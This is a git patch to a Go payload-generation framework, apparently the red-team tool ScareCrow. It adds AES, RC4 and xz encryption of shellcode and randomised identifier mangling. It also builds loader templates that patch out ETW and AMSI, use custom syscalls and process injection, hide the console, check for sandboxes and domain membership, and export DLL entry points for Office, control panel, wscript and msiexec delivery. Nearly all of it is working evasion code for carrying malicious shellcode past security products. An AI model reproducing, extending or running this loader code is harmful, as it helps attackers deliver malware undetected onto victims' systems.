From 210410adf3dd0cad8ceebfee56ee2d35ec6d48c4 Mon Sep 17 00:00:00 2001 From: Tylous Date: Thu, 20 Apr 2023 13:51:50 -0400 Subject: [PATCH] v5.0 --- Cryptor/Cryptor.go | 85 ++ Loader/Loader.go | 1163 ++++++++++++++------------- README.md | 145 +++- ScareCrow.go | 103 ++- Struct/Struct.go | 1514 +++++++++++++----------------------- Utils/Utils.go | 88 ++- go.mod | 8 +- go.sum | 13 +- limelighter/limelighter.go | 88 +-- 9 files changed, 1537 insertions(+), 1670 deletions(-) diff --git a/Cryptor/Cryptor.go b/Cryptor/Cryptor.go index 7a6057c..b9c2e3f 100644 --- a/Cryptor/Cryptor.go +++ b/Cryptor/Cryptor.go @@ -2,17 +2,25 @@ package Cryptor import ( "bytes" + "crypto/aes" + "crypto/cipher" "crypto/rand" + "crypto/rc4" "encoding/hex" "errors" "fmt" + "io" + "io/ioutil" "log" crand "math/rand" "time" + + "github.com/ulikunitz/xz" ) const capletters = "ABCDEFGHIJKLMNOPQRSTUVWXYZ" const letters = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ" +const hexchar = "abcef12345678890" var ( ErrInvalidBlockSize = errors.New("[-] Invalid Blocksize") @@ -22,6 +30,74 @@ var ( ErrInvalidPKCS7Padding = errors.New("[-] Invalid Padding on Input") ) +func EncryptShellcode(inputFile string, encryptionmode string) (string, string, string) { + var rawbyte []byte + var b64ciphertext, b64key, b64iv string + src, _ := ioutil.ReadFile(inputFile) + if encryptionmode == "AES" { + rawbyte = src + key := RandomBuffer(32) + iv := RandomBuffer(16) + + block, err := aes.NewCipher(key) + if err != nil { + log.Fatal(err) + } + paddedInput, err := Pkcs7Pad([]byte(rawbyte), aes.BlockSize) + if err != nil { + log.Fatal(err) + } + cipherText := make([]byte, len(paddedInput)) + ciphermode := cipher.NewCBCEncrypter(block, iv) + ciphermode.CryptBlocks(cipherText, paddedInput) + b64ciphertext = fmt.Sprintf("%x", cipherText) + b64key = fmt.Sprintf("%x", key) + b64iv = fmt.Sprintf("%x", iv) + return b64ciphertext, b64key, b64iv + } + if encryptionmode == "ELZMA" { + var buf bytes.Buffer + fmt.Println("[*] Encrypting Shellcode Using ELZMA Encryption") + w, err := xz.NewWriter(&buf) + if err != nil { + log.Fatalf("xz.NewWriter error %s", err) + } + if _, err := io.WriteString(w, string(src)); err != nil { + log.Fatalf("WriteString error %s", err) + } + if err := w.Close(); err != nil { + log.Fatalf("w.Close error %s", err) + } + fart := fmt.Sprintf("%x", buf.Bytes()) + b64ciphertext = fart + return b64ciphertext, b64key, b64key + } + if encryptionmode == "RC4" { + plaintext := []byte(src) + fmt.Println("[*] Encrypting Shellcode Using RC4 Encryption") + key, _ := generateRandomBytes(32) + block, _ := rc4.NewCipher(key) + ciphertext := make([]byte, len(plaintext)) + block.XORKeyStream(ciphertext, plaintext) + + b64ciphertext = fmt.Sprintf("%x", ciphertext) + b64key = fmt.Sprintf("%x", key) + + } + return b64ciphertext, b64key, b64iv + +} + +func generateRandomBytes(n int) ([]byte, error) { + b := make([]byte, n) + _, err := rand.Read(b) + if err != nil { + return nil, err + } + + return b, nil +} + func Pkcs7Pad(b []byte, blocksize int) ([]byte, error) { if blocksize <= 0 { return nil, ErrInvalidBlockSize @@ -54,6 +130,15 @@ func RandStringBytes(n int) string { return string(b) } +func Mangle(n int) string { + b := make([]byte, n) + for i := range b { + b[i] = hexchar[crand.Intn(len(hexchar))] + + } + return string(b) +} + func VarNumberLength(min, max int) string { var r string crand.Seed(time.Now().UnixNano()) diff --git a/Loader/Loader.go b/Loader/Loader.go index 5a44352..c6f094d 100644 --- a/Loader/Loader.go +++ b/Loader/Loader.go @@ -41,16 +41,18 @@ type AMSI struct { Variables map[string]string } -type WriteProcessMemory struct { +type Console struct { Variables map[string]string } -type DLL struct { +type WriteProcessMemory struct { Variables map[string]string } -type WindowsVersion struct { + +type Header struct { Variables map[string]string } + type Sandboxfunction struct { Variables map[string]string } @@ -67,6 +69,14 @@ type Shellcode struct { Variables map[string]string } +type Shellcode_Loader struct { + Variables map[string]string +} + +type Reload struct { + Variables map[string]string +} + var ( buffer bytes.Buffer ) @@ -109,7 +119,7 @@ func FileName(mode string) (string, string) { return name, filename } -func ETW_Buff(b64number int, decode string, WriteProcessMemory string) (string, string) { +func ETW_Buff(b64number int, decode string, WriteProcessMemory string) (string, string, string) { var buffer bytes.Buffer ETW := &ETW{} ETW.Variables = make(map[string]string) @@ -127,6 +137,7 @@ func ETW_Buff(b64number int, decode string, WriteProcessMemory string) (string, ETW.Variables["nLength"] = Cryptor.VarNumberLength(4, 9) ETW.Variables["datalength"] = Cryptor.VarNumberLength(4, 9) + ETW.Variables["RemoteETW"] = Cryptor.VarNumberLength(4, 9) ETW.Variables["decode"] = decode ETW.Variables["WriteProcessMemoryName"] = Utils.StringEncode("WriteProcessMemory", b64number) ETW.Variables["EtwNotificationRegisterName"] = Utils.StringEncode("EtwNotificationRegister", b64number) @@ -143,7 +154,7 @@ func ETW_Buff(b64number int, decode string, WriteProcessMemory string) (string, if err := ETWTemplate.Execute(&buffer, ETW); err != nil { log.Fatal(err) } - return buffer.String(), ETW.Variables["ETW"] + return buffer.String(), ETW.Variables["ETW"], ETW.Variables["RemoteETW"] } func AMSI_Buff(WriteProcessMemory string) (string, string) { @@ -200,479 +211,418 @@ func WriteProcessMemory_Buff(number string, b64number int) (string, string, stri return buffer.String(), WriteProcessMemory.Variables["decode"], WriteProcessMemory.Variables["WriteProcessMemory"] } -func DLLfile(b64ciphertext string, b64key string, b64iv string, mode string, refresher bool, name string, sandbox bool, ETW bool, ProcessInjection string, AMSI bool) (string, string, string) { - var LoaderTemplate, DLLStructTemplate string - DLL := &DLL{} - DLL.Variables = make(map[string]string) - Sandboxfunction := &Sandboxfunction{} - Sandboxfunction.Variables = make(map[string]string) - Sandbox_DomainJoined := &Sandbox_DomainJoined{} - Sandbox_DomainJoined.Variables = make(map[string]string) - WindowsVersion := &WindowsVersion{} - WindowsVersion.Variables = make(map[string]string) - DLL.Variables["FuncName"] = Cryptor.CapLetter() + Cryptor.VarNumberLength(10, 19) - DLL.Variables["NTFuncName"] = Cryptor.CapLetter() + Cryptor.VarNumberLength(10, 19) - DLL.Variables["buff"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["alloc"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["phandle"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["baseA"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["zerob"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["alloctype"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["protect"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["regionsizep"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["regionsize"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["Versionfunc"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["k"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["Version"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["MV"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["MinV"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["customsyscall"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["syscallnumber"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["dll"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["error"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["x"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["file"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["loaddll"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["handle"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["dllBase"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["dllOffset"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["old"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["oldptrperms"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["ptr"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["shellcode"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["loader"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["DLLname"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["hexdata"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["Reloading"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["bytes"] = Cryptor.VarNumberLength(10, 19) - - DLL.Variables["customsyscallVP"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["runfunc"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["bytes"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["loc"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["dllOffset"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["mem"] = Cryptor.VarNumberLength(10, 19) - - DLL.Variables["getWin"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["showWin"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["hwnd"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["oldfartcodeperms"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["baseAddress"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["processHandle"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["handlez"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["sysid"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["bytesdata"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["locdata"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["xdata"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["dllBasedata"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["dllOffsetdata"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["memdata"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["CreateProcess"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["GetModuleInformation"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["ReloadRemoteProcess"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["RemoteModuleReloading"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["Target"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["WriteProcessMemory"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["addr"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["buf"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["commandLine"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["data"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["err"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["funcNtAllocateVirtualMemory"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["funcNtCreateThreadEx"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["funcNtProtectVirtualMemory"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["funcNtWriteVirtualMemory"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["hModule"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["hProcess"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["handleSize"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["hh"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["lpBaseAddress"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["lpBuffer"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["lpNumberOfBytesWritten"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["mi"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["mod"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["modules"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["module"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["nLength"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["nSize"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["name"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["needed"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["n"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["offsetaddr"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["oldProtect"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["outString"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["pi"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["procEnumProcessModules"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["EnumProcessModules"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["procGetModuleBaseName"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["GetModuleBaseName"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["procGetModuleInformation"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["procWriteProcessMemory"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["process"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["rawbytes"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["raw_bin"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["s"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["si"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["size"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["startupInfo"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["PROCESS_ALL_ACCESS"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["errnoERROR_IO_PENDING"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["errERROR_IO_PENDING"] = Cryptor.VarNumberLength(10, 19) - - b64number := Cryptor.GenerateNumer(3, 6) - DLL.Variables["b64number"] = strconv.Itoa(b64number) - DLL.Variables["errnoErr"] = Cryptor.VarNumberLength(4, 9) - DLL.Variables["WriteProcessMemoryName"] = Utils.StringEncode("WriteProcessMemory", b64number) - - DLL.Variables["decode"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["b64"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["decoded"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["number"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["sum"] = Cryptor.VarNumberLength(10, 19) - - DLL.Variables["MI"] = Cryptor.VarNumberLength(4, 9) +func Imports_Buff(binary bool, console bool, sandbox bool, injection string, evasion string, ETW bool, AMSI bool) string { + var buffer bytes.Buffer + Imports := &Header{} + Imports.Variables = make(map[string]string) - if sandbox == true { - DLL.Variables["SandboxOS"] = `"os"` - DLL.Variables["IsDomainJoined"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["domain"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["status"] = Cryptor.VarNumberLength(10, 19) - SandboxFunctionTemplate, err := template.New("Sandboxfunction").Parse(Struct.Sandbox()) - if err != nil { - log.Fatal(err) + if binary == false { + Imports.Variables["CPORT"] = `import "C"` + } else { + Imports.Variables["CPORT"] = "" + } + if binary == true || (binary == false && AMSI == false) { + Imports.Variables["Windows_Import"] = `"golang.org/x/sys/windows"` + } else { + Imports.Variables["Windows_Import"] = `"golang.org/x/sys/windows"` + } + if evasion == "KnownDLL" { + Imports.Variables["debugpeimport"] = `filepe "debug/pe"` + Imports.Variables["AdditionalImports"] = `"github.com/Binject/debug/pe" + "github.com/awgh/rawreader"` + Imports.Variables["fmt"] = `"fmt"` + if injection != "" { + Imports.Variables["fmt"] = `"fmt" + "io/ioutil"` } - if err := SandboxFunctionTemplate.Execute(&buffer, DLL); err != nil { - log.Fatal(err) + } + if evasion == "Disk" { + Imports.Variables["debugpeimport"] = `"debug/pe"` + Imports.Variables["AdditionalImports"] = "" + if binary == false { + Imports.Variables["fmt"] = `"fmt" + "io/ioutil"` + } else { + Imports.Variables["fmt"] = `"fmt" + "io/ioutil"` } - DLL.Variables["Sandboxfunction"] = buffer.String() - DLL.Variables["checker"] = Cryptor.VarNumberLength(10, 19) - Sandbox_DomainJoinedTemplate, err := template.New("Sandbox_DomainJoined").Parse(Struct.Sandbox_DomainJoined()) - buffer.Reset() - if err != nil { - log.Fatal(err) + } + if evasion == "None" { + Imports.Variables["debugpeimport"] = "" + Imports.Variables["AdditionalImports"] = "" + if binary == false { + //temp fix for DLLs with None + Imports.Variables["fmt"] = `"fmt"` + } else { + Imports.Variables["fmt"] = `"fmt"` } - if err := Sandbox_DomainJoinedTemplate.Execute(&buffer, DLL); err != nil { - log.Fatal(err) + if injection != "" { + Imports.Variables["fmt"] = `"fmt" + "debug/pe" + "io/ioutil"` } - DLL.Variables["Sandbox"] = buffer.String() - buffer.Reset() - } else { - DLL.Variables["SandboxOS"] = "" - DLL.Variables["Sandbox"] = "" - DLL.Variables["Sandboxfunction"] = "" - DLL.Variables["SandboxImport"] = "" } - - WindowsVersion.Variables["Version"] = DLL.Variables["Version"] - WindowsVersion.Variables["syscall"] = DLL.Variables["syscall"] - WindowsVersion.Variables["customsyscall"] = DLL.Variables["customsyscall"] - WindowsVersion.Variables["customsyscallVP"] = DLL.Variables["customsyscallVP"] - buffer.Reset() - - if (ETW == false || AMSI == false) || ProcessInjection != "" { - WriteProcessMemory_Function, decode, WriteProcessMemory := WriteProcessMemory_Buff(DLL.Variables["b64number"], b64number) - DLL.Variables["decode"] = decode - DLL.Variables["WriteProcessMemory_Function"] = WriteProcessMemory_Function - DLL.Variables["WriteProcessMemory"] = WriteProcessMemory - } else { - DLL.Variables["WriteProcessMemory_Function"] = "" - } - - if ETW == false { - ETW_Function, ETW := ETW_Buff(b64number, DLL.Variables["decode"], DLL.Variables["WriteProcessMemory"]) - DLL.Variables["ETW"] = ETW + "()" - DLL.Variables["ETW_Function"] = ETW_Function - DLL.Variables["B64"] = `"encoding/base64"` + if binary == true && console == true { + Imports.Variables["DebugImport"] = `"io" + "os"` } else { - DLL.Variables["ETW"] = "" - DLL.Variables["ETW_Function"] = "" - DLL.Variables["B64"] = `` + Imports.Variables["DebugImport"] = "" } - if AMSI == false { - AMSI_Function, AMSI := AMSI_Buff(DLL.Variables["WriteProcessMemory"]) - DLL.Variables["AMSI_Function"] = AMSI_Function - DLL.Variables["AMSI"] = AMSI + "()" - DLL.Variables["Windows_Import"] = `"golang.org/x/sys/windows"` - + if sandbox == true { + if console == true { + Imports.Variables["SandboxOS"] = "" + } else { + Imports.Variables["SandboxOS"] = `"os"` + } } else { - DLL.Variables["AMSI_Function"] = "" - DLL.Variables["AMSI"] = "" - DLL.Variables["Windows_Import"] = `` + Imports.Variables["SandboxOS"] = "" } - - if ETW == false || AMSI == false { - DLL.Variables["HEX_Import"] = `"encoding/hex"` + if ETW == false || AMSI == false || injection != "" { + Imports.Variables["HEX_Import"] = `"encoding/hex"` } else { - DLL.Variables["HEX_Import"] = `` + Imports.Variables["HEX_Import"] = "" } - - if refresher == false { - LoaderTemplate = Struct.WindowsVersion_Syscall() - DLLStructTemplate = Struct.DLL_Refresher() + if binary == false && injection == "" { + Imports.Variables["Time_Import"] = "" } else { - LoaderTemplate = Struct.WindowsVersion_Syscall_Unmod() - DLLStructTemplate = Struct.DLL() - } - if ProcessInjection != "" && refresher == false { - ProcessInjection = strings.Replace(ProcessInjection, "\\", "\\\\", -1) - DLL.Variables["processpath"] = ProcessInjection - DLL.Variables["offset"] = Cryptor.VarNumberLength(4, 9) - DLL.Variables["datalength"] = Cryptor.VarNumberLength(4, 9) - LoaderTemplate = Struct.WindowsVersion_Syscall() - DLLStructTemplate = Struct.Procces_Injection_DLL() - + Imports.Variables["Time_Import"] = `"time"` } - WindowsVersionTemplate, err := template.New("WindowsVersion").Parse(LoaderTemplate) + ImportTemplate, err := template.New("Imports").Parse(Struct.Imports()) if err != nil { log.Fatal(err) - } - buffer.Reset() - if err := WindowsVersionTemplate.Execute(&buffer, WindowsVersion); err != nil { + if err := ImportTemplate.Execute(&buffer, Imports); err != nil { log.Fatal(err) } - DLL.Variables["SyscallNumberlist"] = buffer.String() - - if mode == "excel" { - DLL.Variables["ExportName"] = Struct.JS_Office_Export() + return buffer.String() +} +func Header_Buff(binary bool, AMSI bool, ETW bool, ProcessInjection string, console bool, sandbox bool, evasion string) (string, string, string, string, string, string, string, string, string, string, string, string, string) { + var buffer bytes.Buffer + Header := &Header{} + Header.Variables = make(map[string]string) + Sandboxfunction := &Sandboxfunction{} + Sandboxfunction.Variables = make(map[string]string) + Sandbox_DomainJoined := &Sandbox_DomainJoined{} + Sandbox_DomainJoined.Variables = make(map[string]string) + Console := &Console{} + Console.Variables = make(map[string]string) + + Header.Variables["Imports"] = Imports_Buff(binary, console, sandbox, ProcessInjection, evasion, ETW, AMSI) + + Header.Variables["PROCESS_ALL_ACCESS"] = Cryptor.VarNumberLength(4, 9) + Header.Variables["customsyscall"] = Cryptor.VarNumberLength(4, 9) + Header.Variables["customsyscallVP"] = Cryptor.VarNumberLength(4, 9) + Header.Variables["number"] = Cryptor.VarNumberLength(4, 9) + + Header.Variables["Sandboxfunction"] = Cryptor.VarNumberLength(4, 9) + + Header.Variables["Versionfunc"] = Cryptor.VarNumberLength(4, 9) + Header.Variables["k"] = Cryptor.VarNumberLength(4, 9) + Header.Variables["Version"] = Cryptor.VarNumberLength(4, 9) //need to export this + Header.Variables["MV"] = Cryptor.VarNumberLength(4, 9) + Header.Variables["MinV"] = Cryptor.VarNumberLength(4, 9) + Header.Variables["customsyscall"] = Cryptor.VarNumberLength(4, 9) + Header.Variables["customsyscallVP"] = Cryptor.VarNumberLength(4, 9) + + Header.Variables["decoded"] = Cryptor.VarNumberLength(4, 9) + Header.Variables["b64"] = Cryptor.VarNumberLength(4, 9) + Header.Variables["sum"] = Cryptor.VarNumberLength(4, 9) + Header.Variables["WriteProcessMemory_Function"] = Cryptor.VarNumberLength(4, 9) + Header.Variables["ETW_Function"] = Cryptor.VarNumberLength(4, 9) + Header.Variables["AMSI_Function"] = Cryptor.VarNumberLength(4, 9) + Header.Variables["FindAddress"] = Cryptor.VarNumberLength(4, 9) + b64number := Cryptor.GenerateNumer(3, 6) + Header.Variables["b64number"] = strconv.Itoa(b64number) + + if console == true { + Header.Variables["Debug"] = ` + var ( + debugWriter io.Writer + ) + + func printDebug(format string, v ...interface{}) { + debugWriter = os.Stdout + output := fmt.Sprintf("[DEBUG] ") + output += format +"\n" + fmt.Fprintf(debugWriter, output, v...) + } + ` + } else { + Header.Variables["Debug"] = "" } - if mode == "control" { - DLL.Variables["ExportName"] = Struct.JS_Control_Export() - + WriteProcessMemory_Function, decode, WriteProcessMemory := WriteProcessMemory_Buff(Header.Variables["b64number"], b64number) + if (ETW == false || AMSI == false) || ProcessInjection != "" { + Header.Variables["decode"] = decode + Header.Variables["WriteProcessMemory_Function"] = WriteProcessMemory_Function + Header.Variables["WriteProcessMemory"] = WriteProcessMemory + } else { + Header.Variables["WriteProcessMemory_Function"] = "" + Header.Variables["decode"] = decode } - if mode == "wscript" || mode == "dll" { - DLL.Variables["ExportName"] = Struct.WS_JS_Export() + if ETW == false { + ETW_Function, ETW, RemoteETW := ETW_Buff(b64number, Header.Variables["decode"], Header.Variables["WriteProcessMemory"]) + Header.Variables["ETW"] = ETW + "()" + Header.Variables["RemoteETW"] = RemoteETW + Header.Variables["ETW_Function"] = ETW_Function + Header.Variables["B64"] = `"encoding/base64"` + } else { + Header.Variables["ETW"] = "" + Header.Variables["RemoteETW"] = "" + Header.Variables["ETW_Function"] = "" + Header.Variables["B64"] = `` } + if AMSI == false { + AMSI_Function, AMSI := AMSI_Buff(Header.Variables["WriteProcessMemory"]) + Header.Variables["AMSI_Function"] = AMSI_Function + Header.Variables["AMSI"] = AMSI + "()" - if mode == "msiexec" { - DLL.Variables["ExportName"] = Struct.WS_JS_Export() + } else { + Header.Variables["AMSI_Function"] = "" + Header.Variables["AMSI"] = "" } + if AMSI == false { + AMSI_Function, AMSI := AMSI_Buff(Header.Variables["WriteProcessMemory"]) + Header.Variables["AMSI_Function"] = AMSI_Function + Header.Variables["AMSI"] = AMSI + "()" - buffer.Reset() + } else { + Header.Variables["AMSI_Function"] = "" + Header.Variables["AMSI"] = "" + } + + if binary == true { + Console.Variables["decode"] = Header.Variables["decode"] + Console.Variables["Console"] = Cryptor.VarNumberLength(10, 19) + Console.Variables["getWin"] = Cryptor.VarNumberLength(10, 19) + Console.Variables["showWin"] = Cryptor.VarNumberLength(10, 19) + Console.Variables["hwnd"] = Cryptor.VarNumberLength(10, 19) + Console.Variables["show"] = Cryptor.VarNumberLength(10, 19) + Console.Variables["SW_RESTORE"] = Cryptor.VarNumberLength(10, 19) + Console.Variables["SW_HIDE"] = Cryptor.VarNumberLength(10, 19) + Console.Variables["GetConsoleWindowName"] = Utils.StringEncode("GetConsoleWindow", b64number) + Console.Variables["ShowWindowName"] = Utils.StringEncode("ShowWindow", b64number) + + ConsoleTemplate, err := template.New("Console").Parse(Struct.Console()) + if err != nil { + log.Fatal(err) + } + if err := ConsoleTemplate.Execute(&buffer, Console); err != nil { + log.Fatal(err) + } + Header.Variables["Console_Function"] = buffer.String() + buffer.Reset() + } else { + Header.Variables["Console_Function"] = "" + } + + if sandbox == true { + Header.Variables["IsDomainJoined"] = Cryptor.VarNumberLength(10, 19) + Header.Variables["domain"] = Cryptor.VarNumberLength(10, 19) + Header.Variables["status"] = Cryptor.VarNumberLength(10, 19) + SandboxFunctionTemplate, err := template.New("Sandboxfunction").Parse(Struct.Sandbox()) + if err != nil { + log.Fatal(err) + } + if err := SandboxFunctionTemplate.Execute(&buffer, Header); err != nil { + log.Fatal(err) + } + Header.Variables["Sandboxfunction"] = buffer.String() + Header.Variables["checker"] = Cryptor.VarNumberLength(10, 19) + Sandbox_DomainJoinedTemplate, err := template.New("Sandbox_DomainJoined").Parse(Struct.Sandbox_DomainJoined()) + buffer.Reset() + if err != nil { + log.Fatal(err) + } + if err := Sandbox_DomainJoinedTemplate.Execute(&buffer, Header); err != nil { + log.Fatal(err) + } + Header.Variables["Sandbox"] = buffer.String() + buffer.Reset() + } else { + Header.Variables["Sandbox"] = "" + Header.Variables["Sandboxfunction"] = "" + Header.Variables["SandboxImport"] = "" + Header.Variables["SandboxOS"] = "" + } - DLLTemplate, err := template.New("DLL").Parse(DLLStructTemplate) + HeaderTemplate, err := template.New("Header").Parse(Struct.Header()) if err != nil { log.Fatal(err) } - buffer.Reset() - if err := DLLTemplate.Execute(&buffer, DLL); err != nil { + if err := HeaderTemplate.Execute(&buffer, Header); err != nil { log.Fatal(err) } - return buffer.String(), DLL.Variables["FuncName"], DLL.Variables["FuncName"] + return buffer.String(), Header.Variables["ETW"], Header.Variables["AMSI"], Header.Variables["Versionfunc"], Header.Variables["Version"], Header.Variables["customsyscall"], Header.Variables["customsyscallVP"], Header.Variables["Sandbox"], Console.Variables["Console"], Header.Variables["PROCESS_ALL_ACCESS"], Header.Variables["WriteProcessMemory"], Header.Variables["FindAddress"], Header.Variables["RemoteETW"] } -func Binaryfile(b64ciphertext string, b64key string, b64iv string, mode string, console bool, sandbox bool, name string, ETW bool, ProcessInjection string, Sleep bool, AMSI bool) (string, string, string) { - var Structure string +func Binaryfile(b64ciphertext string, b64key string, b64iv string, mode string, console bool, sandbox bool, name string, ETW bool, ProcessInjection string, Sleep bool, AMSI bool, export string, Exec_Type string, evasion string) (string, string, string) { + var Structure, ReloadCode string + var binary bool var buffer bytes.Buffer Binary := &Binary{} - Sandboxfunction := &Sandboxfunction{} - Sandboxfunction.Variables = make(map[string]string) - Sandbox_DomainJoined := &Sandbox_DomainJoined{} - Sandbox_DomainJoined.Variables = make(map[string]string) Binary.Variables = make(map[string]string) - WindowsVersion := &WindowsVersion{} - WindowsVersion.Variables = make(map[string]string) + Reload := &Reload{} + Reload.Variables = make(map[string]string) + if mode == "binary" { + binary = true + Structure = Struct.Binary() + } else { + binary = false + Structure = Struct.DLL_Refresher() + if mode == "excel" { + Binary.Variables["ExportFunction"] = `` + Binary.Variables["ExportName"] = Struct.JS_Office_Export() + } + if mode == "control" { + Binary.Variables["ExportFunction"] = `` + Binary.Variables["ExportName"] = Struct.JS_Control_Export() + } + if mode == "wscript" || mode == "dll" { + Binary.Variables["ExportFunction"] = `` + Binary.Variables["ExportName"] = Struct.WS_JS_Export() + } + if mode == "dll" && export != "" { + Binary.Variables["ExportFunction"] = `//export ` + export + ` + func ` + export + `() { + Run() + }` + Binary.Variables["ExportName"] = Struct.WS_JS_Export() + } + if mode == "msiexec" { + Binary.Variables["ExportName"] = Struct.WS_JS_Export() + Binary.Variables["ExportFunction"] = `` + } + } + Header, ETWFunctionName, AMSIFunctionName, Versionfunc, Version, customsyscall, customsyscallVP, Sandbox, Console, PROCESS_ALL_ACCESS, WriteProcessMemory, FindAddress, RemoteETWFunctionName := Header_Buff(binary, AMSI, ETW, ProcessInjection, console, sandbox, evasion) + Shellcode_Exec, Shellcode_Exec_Function, Raw_Bin := Shellcode_Loader_Buff(Exec_Type, ProcessInjection, customsyscall, customsyscallVP, PROCESS_ALL_ACCESS, WriteProcessMemory, console, FindAddress, RemoteETWFunctionName) + Binary.Variables["Shellcode_Exec"] = Shellcode_Exec + Binary.Variables["Shellcode_Exec_Function"] = Shellcode_Exec_Function + Binary.Variables["raw_bin"] = Raw_Bin + Binary.Variables["Header"] = Header + Binary.Variables["ETW"] = ETWFunctionName + Binary.Variables["AMSI"] = AMSIFunctionName + Binary.Variables["Versionfunc"] = Versionfunc + Binary.Variables["Version"] = Version + Binary.Variables["customsyscall"] = customsyscall + Binary.Variables["customsyscallVP"] = customsyscallVP + Binary.Variables["Console"] = Console + Binary.Variables["Sandbox"] = Sandbox + Binary.Variables["Reloading"] = Cryptor.CapLetter() + Cryptor.VarNumberLength(10, 19) + "()" Binary.Variables["FuncName"] = 